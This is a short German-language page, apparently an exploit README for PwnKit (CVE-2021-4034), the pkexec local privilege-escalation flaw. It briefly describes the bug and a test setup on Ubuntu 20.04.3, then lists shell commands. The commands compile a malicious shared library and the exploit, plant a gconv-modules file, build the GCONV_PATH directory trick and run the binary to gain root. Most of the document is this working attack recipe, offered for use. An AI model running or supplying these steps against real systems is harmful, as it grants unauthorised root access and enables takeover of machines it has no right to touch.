
PwnKit – Lokale Privilegienausweitungsschwachstelle, entdeckt in polkits pkexec (CVE-2021-4034)
Das Qualys Research Team hat eine Speicherkorruptions-Schwachstelle in polkits pkexec entdeckt, einem SUID-Root-Programm, das standardmäßig auf jeder großen Linux-Distribution installiert ist. Diese leicht ausnutzbare Schwachstelle ermöglicht es jedem unprivilegierten Benutzer, durch Ausnutzung dieser Schwachstelle in ihrer Standardkonfiguration volle Root-Rechte auf einem verwundbaren Host zu erlangen.
PwnKit: Lokale Privilegienerweiterungs-Schwachstelle in polkits pkexec entdeckt (CVE-2021-4034)
Ubuntu 20.04.3 LTS x86_64
pkexec Version 0.105
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit